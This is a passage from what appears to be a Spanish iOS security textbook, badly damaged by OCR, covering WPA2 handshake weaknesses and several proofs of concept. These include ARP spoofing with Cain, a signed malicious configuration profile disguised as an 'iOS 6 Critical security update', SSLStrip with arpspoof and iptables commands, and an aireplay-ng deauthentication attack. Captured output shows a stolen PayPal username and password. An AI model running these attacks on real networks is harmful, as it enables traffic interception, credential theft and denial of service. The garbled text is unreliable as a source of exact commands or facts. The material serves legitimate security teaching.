en  la  que  el  cliente  envía  el  ESSíD  de  la  red  a  la  que  desea  cimecíarse,  se  espera  a  que  el  punto 
responda,  y  comienza  la  fase  de  autenticación  y  asociación.  A  continuación  se  muestran  todas  las 
tases  descritas  en  la  siguiente  captura; 

- ► 


_ _ Pirotoíiespf^nse-rRSNIE 

CCMP  Meas»,  OCW  Ucosí.  P5K - 

"  ■■Opw  Síístóni  Auihofiticatiod  naqgt&ai 

^  Qp<>n  S)raiBinJUiih«riíi::!s:íori 

Á«ociatk3i>  nequBSi  ♦  R3M  lE 

3TA  r*qpiest  CCMP  Mottsa.  OCUP  Uoui  PStT 

■  Amcfaimn  naporee  <  OK 

írmigen  10.11:  Nef^ociación  WPA2-PSK  en  una  red  sin  pobíícacíóii  de  ESSID, 

T..a  diferencia  con  una  red  abierta  o  WEP,  es  que  el  punto  de  acceso  y  diente  negocian  una  política 
de  seguridad  a  seguir,  como  primera  fase  de  la  autenticación. 

Este  proceso  es  importante,  ya  que  el  cliente  se  conecta  a  la  red  sin  que  haya  comenzado  el  procesf> 
de  autenticación,  por  lo  que  el  tráfico  no  está  siendo  cifrado  todavía,  lo  que  pemiiliría  realizar  un 
ataque  de  desasr>cíacion,  conocido  también  corno  ataque  d,  que  provocaría  que  el  cliente  comenzase 
u¡^  iiucvt>  proceso  de  auteiiticEiGióii  y  aííociación. 

Este  proceso  de  reautenticación  se  realizaría  únicamente  si  la  conexión  se  tratase  de  WTA^'P.A2 
empresarial,  es  decir,  la  conexión  está  configurada  utilizando  802. 1  x  para  la  autenticación  del  puerto 
y  EAP  (Extended  Authetication  ProtfKol}  contra  un  sei-vidoi  RADIÍJS  (Bemote  Authenticatiun 
Dial-ln  User  Service)  para  autenticar  la  conexión.  En  el  caso  de  WTA/WPA2  con  PSK  se  pasa 
directamente  a  la  fase  de  intercambio  de  claves. 

En  la  fase  de  Intercambio  de  claves  el  cliente  y  el  AP  utilizan  la  PSK  para  generar  una  clave 
llamada  PMK  (Pairwise  Master  KeyJ.  Esta  PMK  es  una  derivada  cuando  el  sistema  es  WPAAVPA2 
empresarial  pero  es  la  misma  PSK  en  los  entornos  WPA/WPA2  PSK. 
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Con  la  PMK  se  gcTicm  iina  clave  de  cifrado  para  cada  procesa  de  autenticación  de  nn  cliente  llamada 
PTK  que  básicamente  se  genera  a  partir  de  dos  números  aleatorios,  uno  de  ellos  generado  por  el 
cliente  y  el  otro  por  el  punto  de  acceso  que  intercanibian  para  obtener  ambos  la  misma  clave  PTK. 
Este  proceso  se  llama  4-\vny-Hcmdshiike, 

Una  vez  que  el  cliente  está  autenticado,  el  protocolo  TKIP  utiliza  6  claves  de  cifrado  por  cada  sesión, 
4  de  ellas  son  ntilizEidas  para  coinuiiicacioiies  uníüm'í  y  2  para  comunicaciones  tmAhicmt,-  Estas 
claves  son  únicas  por  di  en  Le  y  sesión  y  se  cambian  periódicamente.  Dichas  claves  se  generan  a  partir 
de  derivadas  de  las  direcciones  >L\C,  ESSID  y  la  PTfC. 

¿Cómo  puede  sei'  \niliierada  la  red  WP.VWPA2  PSK?  Un  atacante  que  se  quiera  \m1nerar  una  red 
WPA-PSK  va  a  tratar  <lc  capturar  ese  intercambio  de  números  aleatorios,  para,  una  vez  conocidos 
estos,  junto  con  el  SS ID  y  las  direcciones  JVLAC  del  cliente  y  el  punió  de  acceso  de  la  red  í)b tener  la 
frase  o  secreto  compaitido  que  se  utilizó.  Una  vez  que  el  atacante  tenga  b  clave  compartida  se  podrá 
eoiieetar  a  la  red. 

¿Podrá  el  atacante  acceder  al  tráñeo  generado  por  otro  usuario?  En  teoría  no  deberia  poder,  pues 
las  claves  TKIP  que  se  generan  son  únicas  y  por  sesión  pero  sí  e1  atacante  está  conectado  a  la  red 
y  captura  todo  c!  proceso  de  autenticación  de  otro  n  su  ario  podría  acceder  a  los  números  aleatorios 
intercambiados  y  al  poder  conocer  el  HSSID,  la  PSK  y  la  MAC  del  cliente  y  el  punto  de  accesi], 
podría  generar  la  PTK.  Con  la  PTK  podría  descubrir  cuales  son  las  claves  TKIP  que  se  intercambian 
cifradas.  Una  vez  que  el  atacante  tiene  las  claves  TKIP  tiene  acceso  a  todo  ei  tráfico  y  por  lanío  SÍ 
puede  acceder  a  los  datos  transmitidos.  El  proceso  con  WPA2-PSK  es  similar  y  el  atacante  buscará 
la¿  claves  que  se  iiiLereambian  en  AES-CCMR 

La  redes  con  cifrado  WEP  está  claro  que  no  proporcionan  suficiente  seguridad  y  tan  solo  podrían  ser 
utilizadas  con  cifrados  de  alto  nivel  como  VPNs.  En  el  caso  del  cifrado  WP.A2,  se  puede  considerar 
como  el  estáudai  de  facto  para  Hecuri/ar  redes  inalámbricas,  pero  aún  así  hay  que  tener  cuidado 
con  la  etmLnuscña,  y  establecer  una  qne  sea  lo  suficientemente  robusta  como  para  evitai'  los  ataques 
conocidos. 


PoC:  ARP  Spoofing  sobre  iPhone  con  cain  en  redes  WEP 

Hn  la  siguiente  pnieba  de  concepto  se  propone  el  siguiente  esceiiai  io: 

Dispositivo  iOS  conectado  a  una  red  Wlreie^íM  con  c i  fiado  WFP 

-  A  tacan  Le  conectado  a  la  misma  red  Wírelesíi. 

-  Se  uiilizará  la  herramienta  cain  para  llevar  a  cabo  el  eiiveneiiainieiito  de  la  tabla  ARP,  ct  jn 
el  fin  de  obtener  credenciales,  cookies  c  inionnación  de  la  víctiina. 

El  dispositivo  IOS  conectado  a.  la  red  Wu^eless  es  im  fPhane  4.  El  atacante  utiliza  cain  sobre  Windows 
7,  de  manera  que  realizando  la  técnica,  explicada  anterio miente,  de  arp  spoqfing^  se  coiiseguuá  el 
objetivo  marcado.  En  la  siguiente  imagen  se  puede  visualizar  la  selección  de  los  objetivos,  mediante 
la  interfaz  de  txím.  En  primer  lugar  se  selecciónala  dirección  IPdei  mnter  y  después  la  de  la  víctima. 
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IningLin  10.12:  Envenenamiento  de  la  tabla  ARP  de  un  dispositivo  IOS  en  ujia  red  WEP. 


Una  vez  realizado  el  eaveiiciiamieriLo,  ck  ptjsible  realizar  diversas  acciones  maliciosas,  aunque  para 
osla  prueba  de  eonceptí>  se  ha  elegido  mostrar  el  robo  de  credenciales  de  algún  sitio  web.  En  la 
siguiente  captura  se  puede  visualizar  dicho  robo  en  el  sitio  web  Focaiprice. 


Imagen  10.13:  Rubn  Je  crtídemeüilet!  de  un  diypvsíLivü  iOS  en  una  red  WEF. 
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H 1  I  F-s:  C  A  Fake 


Después  de  ia  prueba  de  concepto  que  se  pudo  ver  en  las  Zero  Nighís  en  Rusia  (finales  del  2012),  de 
la  mano  del  investigador  TrosícheK  en  la  que  se  mostraba  como  realizar  un  ataque  MITM  utilizando 
un  certificado  de  una  C  A  o  entidad  certificadora  de  confianza. 

La  idea  del  ataque,  es  casi  la  misma  que  se  ha  utilizado  para  despleg  aro  insta  lar  troy  anos  en  dispositivos 
que  lio  tienen  Jaíibreak,  es  deciii  a  través  de  un  perfil  de  aprovisioiianiieiito  o  Provislomn^^  Frofile, 
que  contiene  cl  43  los  UDID  de  los  disp43SÍLivos  víctima,  de  manera  que  permitiría  la  instalación 
de  softtvare  sin  firmar  por  Apple  o  de  ñientes  no  confiables,  y  en  el  que  era  necesario  un  poco  de 
ingenieiia  social,  pam  que  la  víctima  se  instalase  dicho  perfil 

En  este  caso  se  hace  uso  de  un  eertiricad4i  de  una  entidad  ecrtíricado ra  de  eonriaiiza  o  CA,  que 
además  esté  dentro  de  la  cadena  de  confianza  Apple,  como  se  puede  comprobar  en  b  siguiente 
web  de  sopotte  técnico  de  Apple  Imp://sitpportüpple.com/kb/HT50}2,  la  cual  se  puede  encontrar 
buscando  en  Google  of  avmlnhle  trusled  mol  (:eriifLeaies''\ 


Certííic^ta  s 


Hudalieri  -■ 

Sigrtatísre  Algaritiwii  BbalWithRSASscxyptjüQis 

i&ausrí  C"GB,  ST=GrHatar  HajichesTer,  ii^salfard,  D^CDMCEJO  ca  Limited,  CR=caMüi®  certif icatian 
VdLldlty 

mt  aeíore:  Dec  1  OUiOOíOü  Z4JM  OHT 
Hot  Aíter  í  Dad  51  a5í5^íSS  Zíia^  (íh.t 


Iniagsn  1004:  Certificado  ds  Comodo  dentro  de  la  lista  de  confianza  Apple. 


Para  obtener  un  certificado  dentro  de  la  cadena  de  C4infianza  de  Apple,  basta  con  mirar  la  larga  lista 


mencionada  anterionnente,  y  buscar  qué  compañías  o  entidades  certificadoras  ofiecen  cerificados 
de  prueba  o  versión  trial,  como  es  el  caso  de  Comodo,  tal  y  como  se  aprecia  en  su  web  oficial: 


Cci^iücb  Free  SSL  íb  a  lUI^'  runcliunal  cerUfícale,  racu^wísd  and  ütist&d  tx/  of  beowsafa.  H  yixi  lo  Qel 
rtd  of  w&b3Se  SBCuiiy  wamtaig  naasapiB  and  givaa  you  tfis  gotden  padioch.  “ 


-  CííTívs  Jo  Digital  v«4ifÍL^ta'  Soíuüo’rfi  - 


Free  Trial  SSL  Certifícate 


Gat  prote^eJ  In  jmt  mínutiís 


Imagen  10.1 5:  Certificado  Trial  de  Comodo. 


Para  conseguir  un  certificado  como  este^  tan  solo  es  necesario  un  correo  de  administrador  de  su 
dominio  particular  yo y  nada  más.  Una  vez  se  tiene  un  certificado  que 
esté  dentro  de  la  cadena  de  confianza  de  Ápple^  comienza  la  parte  de  ingeniería  social  del  ataque. 
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La  idea  que  cuando  el  uHLiarío  vaya  a  instalar  un  perftt  de  configuración,  puedan  ir  dirercnles 
parámcLroK  ya  configurados,  como  por  ejemplo: 

-  Los  datos  de  conexión  a  una  led  Wi-Fí^  que  Hcra  el  punto  de  acceso  malicioso  controlado 
por  el  atacante. 

Certificado  CA. 

-  Configuración  del  Proxy^  por  sí  se  desea  capturar  el  tráfico  de  la  víctima  (solo  en  iOS  6]. 
iCloud  backup  (si  no  eslá  habilitado  se  puede  iiabilimi  ). 


Dicho  pLTlil  no  aparece  sin  firman  ya  que  genera  desconfianza  en  las  víctimas  potenciales  y  la  parte 
del  engaño  o  de  ingeniería  social  se  complicaría.  A  coiiLin  unción,  se  presenta  una  captura  de  un  perfil 
de  configuración  sin  finiLar,  en  la  que  aparece  un  aviso  de  color  rojo  que  adviene  que  dicho  perfil 
no  está  finnado  CSinfinnaF^^  además  de  que  cuando  se  haga  clic  cii  el  bolón  instalar,  aparecerá  im 
popup  o  cuadro  de  diálogo  avisando  al  usuarit>: 


iíiiageii  10. 1 6:  Perfil  fin  firmar  eii  iOS  y  eí  aviso  al  Lnislíiiarlo. 


Una  vez  que  se  ha  creado  un  perfil  de  configuración  adaptado  a  las  necesidades,  éticas  o  no,  bastaría 
con  firmar  el  perfil  de  configuración,  pura  hacer  más  creíble  el  engaño,  de  manera  que  el  usuario 
vería  que  el  perfil  está  firmado,  facilitando  la  parte  de  ingeniería  social. 

Para  finnar  dicho  perfil  de  aprovisionamiento  o  de  configuración,  será  neccHurio  el  certificado  trial 
que  se  ha  descargado  previamente  de  la  web  de  Camoda  o  íle  alguna  entidad  certificadom  que  esté 
incluida  en  la  codeiia  de  confianza  de  Apple,  y  la  iidiidad  Open^SL.  Los  comandos  necesarios  se 
presentan  en  la  siguiente  imagen. 
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\  hia  VG7  que  se  ha  firmado,  el  perfil  de  confiy:uraeión  tiene  mucho  mejor  aspecto.  Además  en  el  perfil 
se  puede  poner  el  nombre  de  la  empresa  deseada,  como  por  ejemplo  Apple  Jfíc.,  o  en  la  descripción 
del  perfil  algo  como  '"'iOS  6  Critica!  sccurity  updarc  %  lo  que  hace  más  fácil  la  parte  de  ingeniería 
social,  para  que  las  víctimas  c  ai  ¿jan  en  la  trampa.  A  continuación  se  muestra  el  perfil  de  configuración 
que  utilizó  Jrosichev  en  las  Zero  Nights: 


[inagen  1  G.1  S:  Perfil  de  configuración  atí libado  por  Trrínchiiv  en  ]a.?í2sro  Nights. 


Cuando  ya  se  tiene  el  perfil  de  configuración  firmado,  es  el  momento  de  instalarlo  en  los  dispositivos 
de  las  víctimas.  Hay  diversas  formas  de  realizar  la  mstalación: 
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A  través  de  Safari  (se  puede  también  en  el  caso  de  que  sea  \m  perfil  de  configiiracioa  con 
nna  CA  incluida). 

A  través  íle  ur\  adjunto  en  mi  correo  electrónico. 

-  A  través  de  un  sisteiim  MDM. 

Y  finalmente,  cuando  por  fin  el  certificado  esté  TFistalado  en  los  dispositivos  víctima  (con  un  poco  de 
ingeniería  social,  claro  está),  es  el  momento  de  comenzar  a  jugar  con  las  víctimas,  y  es  que  eun  el 
esquema  presentado  por  Trosichev^  se  podría  realizar  lo  siguiente; 

-  Smjftng  o  captura  de  todo  el  tráfico  SSL  (cookies^  contrasenas,  etcétera). 

-  Robo  de  la  copia  de  seguridad  o  backup  (registros  de  llamadas  y  mensajes,  fotos,  vídeos, 
[latos  de  las  aplicaciones,  etcétera). 

Envío  de  mensajes  o  wipeos  remotos. 

y  es  que  corno  se  puede  apreciar,  una  vez  instalada  la  CA  maliciosa  en  el  terminal,  se  abreu  muchas 
p  ti  erras  a  numerosos  ataques.  La  siguiente  imagen  muestra  el  esquctiia  prese  ritadí)  por  Trf}.^irhev  en 
Sü  conferencia: 


Tmiagírji  10.19:  Etiquemu  pros  talado  por  Ih^.'sicHex-  en  las  Zero  Ni:^hís. 


Resumiendo  se  puede  decnt  que  con  tan  solo  dos  clics  que  haga  d  usuario  víctima  e  instale  el  perfil 
malicioso  finnado  por  un  aiacaulc,  d  dispositivo  estará  a  merced  del  mismo. 


ssnsniff  y  SSLStrip 

Las  técnicas  SSLSniffy  SSLSirip  pemiilcii  al  alacaiiLc  «iblcner  información  que  va  protegida  bajo 
la  capa  SSL.  La  primera  que  se  va  a  estudiar  es  SSLSniff,  ya  que  es  la  más  antigua  y  conocida.  Hay 
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que  recalcar  que  las  dos  técnicas  afccLan  a  dispositivos  tOS  y  fiieron  descubiertas  y  desarrolladas 
por  Moxie  Mürliyibplke. 

HI  pioblciíia  de  los  cenificados  y  del  cual  se  aprovecha  SSLSniffmákü  en  las  Basic  Comtraints. 
Si  el  navegador  no  verifica  las  Basic  Coñstraíyils^  que  es  un  bit,  um  certificado  emitido  para  un 
dominio  en  concrelo,  podría  sor  utilizado  para  emitir  otros  certificados  pam  otros  donriiiios.  En  otras 
palabras,  ol  hug^^  que  un  certificado  emitido  a  una  empresa  no  debería  einiiir  corliíioados  para  otros 
dominios,  por  lo  que  se  le  restringe  como  no  válido  para  rinnar  dichos  dominios. 

Resumiendo  atm  más,  si  Veylsígn  eíiiite  un  certiricado  para  una  empresa  X,  los  propietarios  de  dicho 
certificado  no  deberían  poder  emirir  im  certificado  para:  por  ejemplo,  paypalcom.  Sin  eiubargiu  lo 
único  que  impide  este  hecho  es  una  marca  en  el  certificado,  una  Basic  Cojistjmnts,  qiJe  debe  ser 
comprobada  por  el  cliente,  es  decir  ol  navegador,  pata  validar  el  certificado.  Por  lo  que  si  llega  un 
cerliíicadü  cniitido  para paypaLcom  que  ha  sido  generado  por  dicha  empresa  X,  el  efiente  debería 
comprobar  si  la  empresa  X  puede  emitir  certificados  para  todos  los  domínitos  y  detectar  que  no  está 
habilitado,  generando  entonces  una  alerta  do  seguridad. 

Sin  embargo,  en  las  versitmes  de  iOS  anteriores  a  la  4.3.5  esta  comprobación  iio  se  realiza,  y  por  lo 
LanUi  so  pueden  generar  certificados  falsos  para  cualquier  banco,  o  cualquier  sisLorua  de  correo  web 
como  Gmail  Hotmail,  Facebooky  etcéreia,  sin  que  se  genere  ninguna  alerta  de  seguridad,  con  solo 
disponer  de  un  certificado  digital  emitido  por  una  entidad  de  confianza  por  el  cliente. 

Mediante  la  herramienta  sarro  liada  poiMoxlc  Madinspike  se  puede  realizar  dicho  ataque. 

La  opemtiva  sería  la  siguiente: 

"  Realizar  un  ataque  MITM  entre  la  víctima  con  dispositivo  IOS  cuya  ver sióii  sería  írireríor 
a  la  4.3  5.  El  ataque  se  realizaria,  por  ejemplo,  con  la  herrarnicriUi  ai'pspfmf. 

-  Una  vez  que  el  tráfico  ilega  al  alacaiiLc,  se  debe  comprobar  que  la  máquina  realiza  el 
fonvardíng  de  los  paquetes. 

-  Configurar  sslsmff  para  generar  los  certificados  falsos  a  partir  de  una  plantilla  válida 
firmada  para  un  dominio  concreto.  En  lu  úlLirna  versión  úe^sskníffs^t  dispone  de  la  posibilidad 
de  indicar  que  el  dispositivo  es  un  iOS.  La  sintaxis  es  la  úgmt-nit  ssbrújf -a  -c  [paíh/(o/your/ 

-f  ios  -h  [httpporíj  -s  [ssíportj  ¡phonc,  log. 

En  Blacklíat  2009,  Moxie  Marlimpihe,  demostró  cómo  hacer  un  robo  de  sesión  o  hijacking  de 
sesión  HTTPs,  con  la  lierramicnLa  de  Linux  SSLStrip,  cuyo  objetivo  es  forzar  el  cambio  de  tipo  de 
conexión,  de  una  conexión  por  SSL  o  11  i  fPS  a  una  conexión  convencional  por  HTTP. 

El  SSLSrrip  es  un  ataque  en  el  que  mediante  MITM  ^se  iTitereeptan  las  peticiones  que  pueden 
desembocar  en  tráfico  seguro  y  se  presenta  al  cliente  el  sitio  web  final  sin  dicha  capa  de  seguridad. 
En  otras  palabras,  S.SLStnp  intercepta  las  peticiones  que  devolverán  un  sitio  web  cifrado  bajt)  d 
protocolo  11  ri  FS,  con  el  fin  de  que  el  cliente  obtenga  una  conexión  por  HTTR  Si  el  cliente  no 
percibe  que  la  conexión  no  se  encuentra  bajo  HTTPS  y  si  bajo  111'  l'P,  toda  la  comunicación  puede 
ser  “visualizada”. 
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En  los  dispositivos  IOS  cuando  una  comimicación  se  jealiza  bajo  HTTPS,  se  puede  ver  uii  candado 
en  la  paite  superior  dul  navegador.  Este  hecho  no  es  similar  en  navegadoi-es  de  equípcjs  de  escritorio 
o  fjorLáLilcs,  en  los  que  se  muestran  colores  y  candados  grandes  para  que  el  cliente  pueda  visualizar 
rápidamente  que  se  encuentra  bajo  una  conexión  segura.  Este  hecho  del  navegador  móvil  Safari 
ayuda  bastante  a  que  un  usuario  pueda  caer  cu  un  ataque  dirigido  por  SSLSlríp. 


PoC:  SSLStrip  en  iOS 

En  esta  prueba  de  concepto  se  realizará  un  ataque  SSLSlrip  contra  un  dispositivo  iOS  con  la  versión 
6A)J.  La  operativa  a  seguir  es  la  siguiente: 

-  El  atacante  conectado  al  mismo  punto  de  acceso  WireÍBss,  realizitrá  arp  spoofing  sobre  el 
disposilivEi  ¡OS. 

-  Una  vez  que  el  tráfico  pasa  por  el  atacante  se  configurará  una  regla  en  iptables  con  el  tin 
de  que  redirija  todas  las  peticiones  de  la  víctima  del  puerto  80  al  lOOOü,  o  el  que  se  configure 
en  la  licrraTnienta  SSLSíTip.  El  objetivo  de  esta  acción  es  que  todo  el  tráfico  HTTP  pase  por  la 
herramienta  y  se  pueda  así  “eiiganar"  a  la  víctima  en  las  páginas  web  seguras. 

-  Por  último  se  arrancará  1h  herramienta  SSLStrip  y  se  esperará  a  que  el  usuario  del 
dispositivo  íOS  se  conecte  a  algún  sitio  seguro,  donde  se  engañará  y  la  conexión  real  eon  el 
aiacaute  se  reahzará  por  HTTP,  quedando  expuesto  al  robo  dé  credenciales,  cookíes^  etcétera. 


A  continuación  se  muestra  una  captura  en  la  que  se  aprecian  los  comandos  necesarios  para  preparar 
la  parte  preiiminaj’  al  alaque  SSlStrip^  que  son  la  coníigLiración  necesaria  para  el  reenvío  correetu 
de  paquetes  mediante  la  modificación  del  fichero  ip y  posteriormente  y  utilizando  la 
aplicación  arpspoof,  realizai'  ei  enveiicn amiento,  con  la  dirección  IP  de  la  víctima  y  la  dirección  IP 
tle  la  puerta  de  enlace.  Además  se  aprecia  cómo  se  crea  la  regla  en  el  fire.vall  iptablcs,  que  permitirá 
que  el  tmfico  del  puerto  SO  se  redirija  al  puerto  10000,  que  es  donde  la  herramicnLa  SSLStrip  se 
pondrá  a  escuchar  o  a  esnifar  el  tráfico. 


oci:íribt:Hf  echo  1  > 
ri>íit@bT ! ip  Lab  Les 
r'catgbt:^  arpspoüf 
l:S:27:a6:ff -26  0:0: 
Í;3j27:d6:ff:76  0:0: 
3:0:27:(i6:ff:2e  0:0: 
?:0;27:d6:ff:2e  0:0: 
2:0:27;<Je;ff:26  0:6: 
!e:27:d6:ff:2S  9:6 


/  p  roe  /  s  vs  /  n  et/i  p  v4/ i  p_f  □  rwa  rd 
-t  fíat  -A  PRFHouTiNC  p  tep  - -des tina t ion- port  kif  -j  REDIRECT  --to-ports  laeea 
-i  eth0  -t  192*168,1.11  192,153.1.12 

0:0:&:3  CBQfi  42:  arp  reply  192.163.1.12  is-at  0 : S: 27:dfi : ff : 26 

S:e:&:0  BBm  42;  arp  reply  192.163.1. 12  is-at  3;e;27:de:ff :2fi 

0:0:S:e  0806  42:  arp  reply  192.168.1.12  is  at  3; 6 ; 27:d6 : ff : 26 

0:0: 0:0  0S06  42:  arp  reply  192.16S*t.t2  is-av  8:0 : 27 :d6 : ff :2ü 

:8  0SB6  42:  arp  rsply  192.160.1.12  is-ai  8:0: 27 :eíS: ft : 25 

:0  9806  42:  arp  reolv  192.160,1,12  is-at  8:6:27:d5: 11:26 

Íniíigei]  10.20:  Configurando  prelirni  113110.“^  a  1,^  ejeiaitión  de  SSLSírtp. 


Una  vez  que  se  han  realizado  todas  las  acciones  preliminares,  se  está  en  disposición  de  liinzar 
el  araqne  son  SSLSírip,  y  poder  capturar  el  trálico  cifrado.  La  sintaxis  es  la  siguiente  ss¿iírip  -w 

< n ambre  /¿che/rj > . 


Una  vez  que  se  ha  lanzado  el  ataque,  si  ludo  ha  sido  configurado  coriectamentc  y  se  ha  capmrado 

el  tráfico,  se  podrá  ver  lo  que  se  ha  encontrado  en  el  fichero  generado  por  SSLSírip,  tal  y  como  se 
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aprecia  en  la  siguiente  captma,  eo  la  que  se  La  capturado  tráfico  cí>ntra  la  web  de  Paypúi^  y  se  puede 
ver  en  plano  tanto  el  usuario  coma  la  contraseña,  en  los  correspondientes  campos  io^in  email  v 
login  _p{Lss^^¡o^á: 


-i/steiTi  r~}  TnuFeÍ>7,  1:29  PM 

'  *  rotttgifoot:  ^penteít^wfrb/sslstríp 

'  T  ;  v,rv.  Te-' m:;!  Til  ’  “i’z 


_ U  facpfoos  ^ _ u  fOcffl^wU  - _  X  nxrti^oqt:  -  ^  ¡  iTOt^rooti/pentesVwK...  IC 

rw  r  -r-  1  rooT  noot  i.ftK  2ftll-ei5-96  eL;32  sslBtríp.py  \\ 

ro^tlróEit: /iKntest/uefa/sslstríp#  cat  ios  ; 

13:28;55r€S9  SECÜRE  PQST  Q^tri  {ww.r.  ¡layp^l  .ccn] ;  | 

carfPtódel. rétunKdCsrf=KFt5PS5fTgEIHT-XJTHplB8SIU-Dr¡BxI&ly  EíqF5VrzDylqJtaHl?Wiurk  i 

JbPk7-D2KJ32ücf  NCmtyiiLPue€itoí7lflíQeT7s  jwUKe!kKYcxe«_iíTR7fl&login_eflrHi  t=juaniiii&liígi  I 

n  paasvfttf ri=133í]  be , .  fis  i ibnlt .  x»Erit  rarfibroK's  er_nafive=Unk  nównsi  rows  e  r  veríi  oa=^  536.25  ' 

Síbrouser  versión  full^Unknnwníiqp&iTiling  systsiwjniiefiiKd&bp  iiiid>^30'l%39al%30nni^ 

7Ea2UDna%7Ea3\3Dna%7E34%3E]Hozil  L  3^7  E  aS%3  Me  t  !:cap^7E^il!%3D5TB^%28  i  Phone^fif^tPlRi 
Pho  ne+DS+6_B_  I+liks+Ma  c+flS+mi+Appt  eWebKin2  F53  6 . 26+^g}ÍK™L%3  C+1  i  ke+ííEckDSSa^+V 

ersionlí2ffi  &^bile%2F19A523+SafárL5it2FB53&.  25í7£37\3Dnaflí7Eae%3Driaft7EaS13[lt  ruiiíilE 

alÉ%3C  nn^7Eíj  11^30 1  riic^7Eal2Sr3DiPhaBC^7Eal3ik3Diia%7EaiiPS3Dfto2Íllaí3!ZF^ .  Bt\28JÍPhon€% 

3BU:PL4-Í  Ph  D  n&+ü5+6_B  1+1  lk&+iní)C-l'OS+X%29  f  Appl  cWcbKÍ  t^2FS3  6 . 2e+^3eKFTML%2C't"l.  i  kfrK* 

CkCft3+¥ersÍon^2Fb.fr+í1obl  LEft2FlflA523+5a  FailtíFBaaH .  35%7Eal5^f  nT5eWEaie^3úna%7 
EaJ7%3Dl50 '8B59'I%7tilQ%3Pm.  paypal. .  CDiiA7Enl3^Dndíl7Ea2e^Dfi3%7Ed2  L%3Dn3%7E¡i22% 

3Dn¿]  k7  Ea23^3D329^7  É  □24\3D488%7  La  25^D32\ /t02  &%3S4fiS%7  Ea2  7^[}naft7Ea23^DTia%7  E329%  I 

30na%7  EaílftSDiidWE  a  5l%3íhia%7E  332%3Dn3%7E3  33%3DDa%7E334^3Dnaft7Ea  35%3Dna\/Ea3fi\3D  n  ' 

a%  7  Ei»37U0nd%7  Ed38\3Dn3\7E  ¿t39%3Ci  id%7Ea4fl%3Dnxi4:7¥a41%30na\7P.i47%3[)no%7£^p_kB 
3D  1%3B  l  V3DS^3IMJÍ0%3  Al  73  a7bÍB%3A3DÍl^  A345  Uil%3MDÍ2%3  A362  Lli2%aASCU3%3Afi  llU  i 
t>Í4%3A4  letl  i  4\3 AñDl5««50UÍ5%3Al6DÍ6%3Aia6Uie V3ftBD  i 7A3 A17e lJi7%3W6Sbp_ks2^p  fcs3= 
rDDt$rci'Ot:/pBnt£st/wb/5s\5trlp#  cat  Los  ¡grep  juaniivii 

EsrfModel. returnedCíJi  h=XFí5PsaFTlJEIJ4T  KbHplBB0íJ2-oriBxieiy  <jqF5VEzDylqk&Rt2¥RlIk 
JbPb£- D2 U32  bKf NUDtyRLPuBedRw7WQ0eY7s  j  wU;(ekKVcKB^  wTR7a&l  ag  i  n  «1  i  Is j  sarmi&log  1 
n_pa ssworrfíí  12 Jabe , . ^ubsit , se=£nt rar&b r OMS^rji áffle^Unkrtown&b rotfse r  ve rs Id fi=aS 35-75 
Ab  rowsc  r_vc  rsií}n_f  uri^bokutiwn&epc  roti  ng_s  ystéü-un  d  ef  irted&bp_»Íd^v^D  1%3  Bans  Qna^ 
7Ea2tíDfia%7Ea3?k3^a5t7Fn4A3O«O7llla%7Ea5Í3D+K:lscBpé%7eaS!t305 .  e4%2aiFhoneA3B^CPlH-Í 

PlwnttHlS+6  ft  l+lilte+HactflS+irfa2»»ApplgWcteit^F53B.2fr+V7aKHTW-%2C+Uke40eckC\29+tf _ 

Tinagen  10,21 :  VisiializFicióii  decrediíucitiltíS  ret^ogidas  mediaoic  SSLSíf'ip, 


PoC:  DOS  a  los  dispositivos  iOS  en  la  Wi-Fi 

En  esta  pnieba  de  concepto  se  realizará  una  tlcncgacTÓTi  de  semeio  a  un  dispositivo  ¡OS  con  el  fiu 
de  que  este  no  tenga  acceso  a  Inrernet,  o  bien,  se  conecte  a  otro  punto  de  acceso  malicioso  que  un 
atacante  tenga  configurado  y  preparado  para  asociar  al  dispositivo  iOS. 

La  operativa  a  seguir  es  la  siguiente: 

"  El  dispositivo  iOS  estará  conectado  a  un  pumo  de  acceso  real, 

-  F1  atacante  utilizará  tm  adaptador  Wireiess  para  enviar  mensajes  de  desautenlicacion, 
mediante  la  herramienta  aireplay-ng. 

-  El  dispositivo  iOS  se  desconectará  del  punto  de  acceso,  quedando  a  merced  de  otro 
posible  Rogi/e  AP. 

En  primer  lugar  se  debe  conñgurar  el  adaptador  Wireless  en  modo  mtJiiiLür,  tal  y  como  se  ha  realizado 
anteriormenie  en  este  capítulo.  Mediante  la  herramienta  aíwdump-ng  mouitoriza  el  tráfico  aéreo, 
y  se  comprueba  que  la  dirección  MAC  del  rO^está  asociada  al  punto  de  acceso  que  sera  víctima  del 
ataque.  En  la  siguiente  imagen  se  puede  visualizar  diclm  situacióiu 
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□I  6  Tf  Elapssd:  3  Uiins  ][  2«13-S2-fia  15:18 
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[imagen  MuniLüri^aciófi  y  comprob£CÍÓTl  ÚC  asociación  entric  iOS  y  el  pninto  de  ñcceau. 


L na  vez  que  se  puede  copiar  la  dirección  TvL4C  dcl  punto  de  acceso  o  bssid y  la  dirección  MAC  del 
cliente  asociado,  (en  este  caso  el  dispositivo  íOS),  se  {iebe  realizar  im  ¿naque  dejípo  Ú  ciín  aii^play- 
ng^  tal  y  cüiíuj  puccic  visualizarse  en  !a  siguiente  imagen. 

rcwtCdbt:-#  aireplay-ng  -0  B  -a  0H;  lE:5ñ;9ri;iSP:  M  -c  E4!CE!SFrH4:Eibí¿fi  monS 
13:17:44  Waiting  for  beacon  trame  [BSSID:  BB : lE; SB: 95 :6F: 7A)  t>n  ch^jincl  B 
13: 17;  45  Sending  64  directed  DeAuttí.  &7MAC:  [E4:  CE:  BF:EJ4:  EO.HS]  [21|75  ACfcj 
13:17:46  Sending  64  directed  DcAuLh*  STMAC;  ÍE4;CE:aF:04:ED:a9Í  [32|64  ACKs] 

13:17:46  Sending  64  directed  DeAutb.  SimC:  í  E4iCE:SF;e4;ED:30¡  [66  ¡67  ACKs] 

13:17:47  Sending  64  directed  DeAtith.  Simt:  |E4:CE!3F:B4:ED:30]  [  B\ñ2  ACKs] 

13: 17:40  Sending  64  dirseted  DeAuth.  STIIAC:  |E4 : CE r8F:B4:EE>: 881  í  ej64  ACKsJ 

13:17:48  Sending  64  dirccted  DeAuth.  5TXC:  [E4; CE: 8F: B4 :E&: Se]  |  B|51  ACKs] 

Iiijcigen  1 0.23:  Ataqué  de  fipo  0  con  aímpiay  contri  di^posiri  vo  iOS. 


Se  puede  visualizar  en  la  línea  de  comandos  como  se  ha  utilizado  el  parámetro  -0  con  im  valor 
asociado  de  0,  ch  decir,  el  número  de  paquetes  que  se  enviarán  de  dcsautenticación.  Cuando  se  envía 
